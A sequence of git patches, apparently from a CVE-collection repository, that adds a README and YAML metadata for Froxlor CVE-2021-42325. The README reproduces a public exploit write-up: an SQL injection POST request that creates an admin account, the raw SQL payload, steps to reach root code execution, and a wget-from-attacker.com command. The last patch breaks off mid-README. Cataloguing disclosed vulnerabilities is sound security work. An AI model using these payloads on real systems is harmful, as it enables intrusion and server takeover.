From 54c29ee827c45b9a3da14c0548f1c279323e8ad6 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:33:44 +0000 Subject: [PATCH 01/31] add cve/Froxlor/2023. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325 | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/CVE-2021-42325 diff --git a/cve/Froxlor/2023/CVE-2021-42325 b/cve/Froxlor/2023/CVE-2021-42325 new file mode 100644 index 00000000..e69de29b -- Gitee From 18793a73c6c59b092594c5bbb05255403116fe41 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:34:49 +0000 Subject: [PATCH 02/31] rename cve/Froxlor/2023/CVE-2021-42325 to cve/Froxlor/2023/CVE-2021-42325/. Signed-off-by: wangyue --- cve/Froxlor/2023/{CVE-2021-42325 => CVE-2021-42325/README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/Froxlor/2023/{CVE-2021-42325 => CVE-2021-42325/README.md} (100%) diff --git a/cve/Froxlor/2023/CVE-2021-42325 b/cve/Froxlor/2023/CVE-2021-42325/README.md similarity index 100% rename from cve/Froxlor/2023/CVE-2021-42325 rename to cve/Froxlor/2023/CVE-2021-42325/README.md -- Gitee From 3f170b508a53c7fba7af07ef0f29e0d8dd14e599 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:35:37 +0000 Subject: [PATCH 03/31] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 91 +++++++++++++++++++++++ 1 file changed, 91 insertions(+) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index e69de29b..4fd9416a 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -0,0 +1,91 @@ +# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +# Exploit Author: Martin Cernac +# Date: 2021-11-05 +# Vendor: Froxlor (https://froxlor.org/) +# Software Link: https://froxlor.org/download.php +# Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +# Patched Version: 0.10.30 +# Category: Web Application +# Tested on: Ubuntu +# CVE: 2021-42325 + +# 1. Technical Description: +# +# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. +# +# 1.1 Pre-requisites +# - Access to a customer account +# - Ability to specify database name when creating a database +# - Feature only availible from 0.10.28 onward and must be manually enabled + + +# 2. Proof Of Concept (PoC): +# +# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +# 2.1 Privilege Escalation +# +# - Sign into Froxlor as a customer +# - View your databases +# - Create a database +# - Put your payload into the "User/Database name" field (if enabled) +# - Application will error out however your SQL query will be executed +# +# The following is a POST request example of running the payload provided, resulting in an administrator account being created +--- +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 + +s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 +--- +# +# 2.2 Remote Code Execution +# +# To achieve RCE as root: +# +# - Sign into Froxlor as the newly created admin account (payload example creds are x:a) +# - Go to System Settings +# - Go to Webserver settings +# - Adjust "Webserver reload command" field to a custom command +# - The command must not contain any of the following special characters: ;|&><`$~? +# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php +# - For example commands see Payloads 4.2 section +# - Trigger configuration file rebuild +# - Use menu item "Rebuild config files" +# - Await a root cron job to execute your command + + +# 3. Vulnerable resources and parameters +# /customer_mysql.php (POST field: custom_suffix) + + +# 4. Payloads +# +# 4.1 SQL Injection payload +# The following payload creates a new Froxlor admin with full access to all customers and the server configuration +# The credentials are: +# - username: x +# - password: a +# +# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- +# +# +# 4.2 Remote Code Execution payload +# Two part payload: +# - wget http://attacker.com/malicious.txt -O /runme.php +# - php /runme.php + + +# 5. Timeline +# 2021-10-11 Discovery +# 2021-10-11 Contact with developer +# 2021-10-11 Patch issued but no release rolled out +# 2021-10-12 Reserved CVE-2021-42325 +# 2021-11-05 Fix release rolled out +# 2021-11-07 Public disclosure + + +# 6. References: +# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 86bbafbf3917be0e73fe3b00d1c7a9a0cbe73958 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:38:34 +0000 Subject: [PATCH 04/31] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 25 +++++++++-------------- 1 file changed, 10 insertions(+), 15 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index 4fd9416a..c9cd9d3f 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -9,17 +9,15 @@ # Tested on: Ubuntu # CVE: 2021-42325 -# 1. Technical Description: -# -# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. # # 1.1 Pre-requisites # - Access to a customer account # - Ability to specify database name when creating a database # - Feature only availible from 0.10.28 onward and must be manually enabled - - -# 2. Proof Of Concept (PoC): + +### 2. Proof Of Concept (PoC): # # The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root # @@ -56,12 +54,11 @@ s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffi # - Use menu item "Rebuild config files" # - Await a root cron job to execute your command - -# 3. Vulnerable resources and parameters +### 3. Vulnerable resources and parameters # /customer_mysql.php (POST field: custom_suffix) -# 4. Payloads +### 4. Payloads # # 4.1 SQL Injection payload # The following payload creates a new Froxlor admin with full access to all customers and the server configuration @@ -76,16 +73,14 @@ s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffi # Two part payload: # - wget http://attacker.com/malicious.txt -O /runme.php # - php /runme.php - - -# 5. Timeline + +### 5. Timeline # 2021-10-11 Discovery # 2021-10-11 Contact with developer # 2021-10-11 Patch issued but no release rolled out # 2021-10-12 Reserved CVE-2021-42325 # 2021-11-05 Fix release rolled out # 2021-11-07 Public disclosure - - -# 6. References: + +### 6. References: # https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 2bcb9fd63017e32e2873c2c9c706aa355821b7cd Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:40:39 +0000 Subject: [PATCH 05/31] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 126 +++++++++++----------- 1 file changed, 63 insertions(+), 63 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index c9cd9d3f..1a371371 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -1,35 +1,35 @@ -# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -# Exploit Author: Martin Cernac -# Date: 2021-11-05 -# Vendor: Froxlor (https://froxlor.org/) -# Software Link: https://froxlor.org/download.php -# Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -# Patched Version: 0.10.30 -# Category: Web Application -# Tested on: Ubuntu -# CVE: 2021-42325 + Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) + Exploit Author: Martin Cernac + Date: 2021-11-05 + Vendor: Froxlor (https://froxlor.org/) + Software Link: https://froxlor.org/download.php + Affected Version: 0.10.28, 0.10.29, 0.10.29.1 + Patched Version: 0.10.30 + Category: Web Application + Tested on: Ubuntu + CVE: 2021-42325 ### 1. Technical Description: Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. -# -# 1.1 Pre-requisites -# - Access to a customer account -# - Ability to specify database name when creating a database -# - Feature only availible from 0.10.28 onward and must be manually enabled + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled ### 2. Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root # -# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -# 2.1 Privilege Escalation -# -# - Sign into Froxlor as a customer -# - View your databases -# - Create a database -# - Put your payload into the "User/Database name" field (if enabled) -# - Application will error out however your SQL query will be executed -# -# The following is a POST request example of running the payload provided, resulting in an administrator account being created +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + + The following is a POST request example of running the payload provided, resulting in an administrator account being created --- POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 Host: localhost @@ -38,49 +38,49 @@ Content-Length: 448 s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 --- -# -# 2.2 Remote Code Execution -# -# To achieve RCE as root: -# -# - Sign into Froxlor as the newly created admin account (payload example creds are x:a) -# - Go to System Settings -# - Go to Webserver settings -# - Adjust "Webserver reload command" field to a custom command -# - The command must not contain any of the following special characters: ;|&><`$~? -# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php -# - For example commands see Payloads 4.2 section -# - Trigger configuration file rebuild -# - Use menu item "Rebuild config files" -# - Await a root cron job to execute your command + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command ### 3. Vulnerable resources and parameters -# /customer_mysql.php (POST field: custom_suffix) + /customer_mysql.php (POST field: custom_suffix) ### 4. Payloads -# -# 4.1 SQL Injection payload -# The following payload creates a new Froxlor admin with full access to all customers and the server configuration -# The credentials are: -# - username: x -# - password: a -# -# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- -# -# -# 4.2 Remote Code Execution payload -# Two part payload: -# - wget http://attacker.com/malicious.txt -O /runme.php -# - php /runme.php + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php ### 5. Timeline -# 2021-10-11 Discovery -# 2021-10-11 Contact with developer -# 2021-10-11 Patch issued but no release rolled out -# 2021-10-12 Reserved CVE-2021-42325 -# 2021-11-05 Fix release rolled out -# 2021-11-07 Public disclosure + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure ### 6. References: -# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 2000c8ddd372bc0a1dcce68251fb134edbc35fc9 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:42:39 +0000 Subject: [PATCH 06/31] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 31 +++++++++++++---------- 1 file changed, 17 insertions(+), 14 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index 1a371371..c1b38e2e 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -1,13 +1,14 @@ - Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) - Exploit Author: Martin Cernac - Date: 2021-11-05 - Vendor: Froxlor (https://froxlor.org/) - Software Link: https://froxlor.org/download.php - Affected Version: 0.10.28, 0.10.29, 0.10.29.1 - Patched Version: 0.10.30 - Category: Web Application - Tested on: Ubuntu - CVE: 2021-42325 +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + ### 1. Technical Description: Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. @@ -28,16 +29,18 @@ The following is a walkthrough of privilege escalation from a mere customer to a - Create a database - Put your payload into the "User/Database name" field (if enabled) - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created ---- + + +``` POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 448 - s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 ---- + +``` + #### 2.2 Remote Code Execution -- Gitee From 0f51ff6db44f49eb32eb27b399028cc06c6f76fa Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:44:07 +0000 Subject: [PATCH 07/31] add cve/Froxlor/2023/yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml new file mode 100644 index 00000000..e69de29b -- Gitee From 0a8d8b813f3b21cc5a3654f722eed7b18d72af8b Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:50:02 +0000 Subject: [PATCH 08/31] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 24 +++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml index e69de29b..85ee9e0e 100644 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-42325 +source: + https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 +info: + name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 + severity: high + description: | + Froxlor是Froxlor团队的一套轻量级服务器管理软件。 + Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 + scope-of-influence: + Froxlor 0.10.2l9.1 + reference: + - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html + - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 + - https://www.exploit-db.com/exploits/50502 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-42325 + edb-id: 50502 + cwe-id: None + cnvd-id: None + kve-id: None + tags: exploit, remote, code execution, sql injection \ No newline at end of file -- Gitee From a97ae870fc7a447755af4468e4c685b5d3860d84 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:59:49 +0000 Subject: [PATCH 09/31] update openkylin_list.yaml. Signed-off-by: wangyue --- openkylin_list.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index a9f9109b..b3c155b5 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -41,6 +41,9 @@ cve: - CVE-2019-0230 Influx-DB: - CVE-2019-20933 + Froxlor: + - CVE-2023-0315 + - CVE-2021-42325 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 -- Gitee From 078f121583b948bd6307c3e2d26f48913b4c481a Mon Sep 17 00:00:00 2001 From: wangyue Date: Sun, 9 Apr 2023 03:47:33 +0000 Subject: [PATCH 10/31] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml index 85ee9e0e..c266bcd9 100644 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml @@ -3,22 +3,24 @@ source: https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 - severity: high + severity: 高危 description: | Froxlor是Froxlor团队的一套轻量级服务器管理软件。 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 scope-of-influence: Froxlor 0.10.2l9.1 reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 + - https://avd.aliyun.com/detail?id=AVD-2021-42325 - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - https://www.exploit-db.com/exploits/50502 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-42325 edb-id: 50502 - cwe-id: None + cwe-id: CWE-89 cnvd-id: None kve-id: None tags: exploit, remote, code execution, sql injection \ No newline at end of file -- Gitee From 896c6642c1a79047ca163bfca1085897915bfd33 Mon Sep 17 00:00:00 2001 From: wangyue Date: Sun, 9 Apr 2023 03:54:41 +0000 Subject: [PATCH 11/31] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml index c266bcd9..f7274053 100644 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml @@ -8,7 +8,7 @@ info: Froxlor是Froxlor团队的一套轻量级服务器管理软件。 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 scope-of-influence: - Froxlor 0.10.2l9.1 + Froxlor 0.9~0.10.30 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - https://avd.aliyun.com/detail?id=AVD-2021-42325 @@ -19,7 +19,6 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42325 - edb-id: 50502 cwe-id: CWE-89 cnvd-id: None kve-id: None -- Gitee From e15f4227dde3d34ecb47ca67c56313b81926d9d7 Mon Sep 17 00:00:00 2001 From: wangyue Date: Sun, 9 Apr 2023 04:00:43 +0000 Subject: [PATCH 12/31] =?UTF-8?q?update=20openkylin=5Flist.yaml.=20=20Frox?= =?UTF-8?q?lor=E5=B7=B2=E5=90=88=E5=B9=B6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: wangyue --- openkylin_list.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index b3c155b5..9666a486 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -41,9 +41,6 @@ cve: - CVE-2019-0230 Influx-DB: - CVE-2019-20933 - Froxlor: - - CVE-2023-0315 - - CVE-2021-42325 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 @@ -163,6 +160,7 @@ cve: Grafana: - CVE-2021-43798 Froxlor: + - CVE-2021-42325 - CVE-2023-0315 cnvd: apache-tomcat: -- Gitee From bd1c0be634868d709ef9a53bd5665cd31a510dfb Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:48:19 +0000 Subject: [PATCH 13/31] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202023?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/2023/.keep diff --git a/cve/Froxlor/2023/2023/.keep b/cve/Froxlor/2023/2023/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ef137df4ee5ac0ee0198a4997a69c23a04ac9c8d Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:48:27 +0000 Subject: [PATCH 14/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2023/2023/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2023/2023/.keep diff --git a/cve/Froxlor/2023/2023/.keep b/cve/Froxlor/2023/2023/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 5af792b5c1c8d1eeafdeb5c402a80d2fd7ef7319 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:49:11 +0000 Subject: [PATCH 15/31] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/.keep diff --git a/cve/Froxlor/2021/.keep b/cve/Froxlor/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 7793c8130e96ad0fe383ec0d0f8092eed6900dd9 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:50:27 +0000 Subject: [PATCH 16/31] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 77ea81cb0c72833ce0bc1507f407a7dd67adcf59 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:50:34 +0000 Subject: [PATCH 17/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2021/CVE-2021-42325/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From aa46c27f5c2ce3ac5ae6b1dd1f2bbf7e8df37428 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:51:28 +0000 Subject: [PATCH 18/31] add cve/Froxlor/2021/README.md. Signed-off-by: wangyue --- cve/Froxlor/2021/README.md | 89 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 cve/Froxlor/2021/README.md diff --git a/cve/Froxlor/2021/README.md b/cve/Froxlor/2021/README.md new file mode 100644 index 00000000..3a4391d3 --- /dev/null +++ b/cve/Froxlor/2021/README.md @@ -0,0 +1,89 @@ +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + + +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled + +### 2. Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + The following is a POST request example of running the payload provided, resulting in an administrator account being created + + +``` +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 +s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 + +``` + + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - 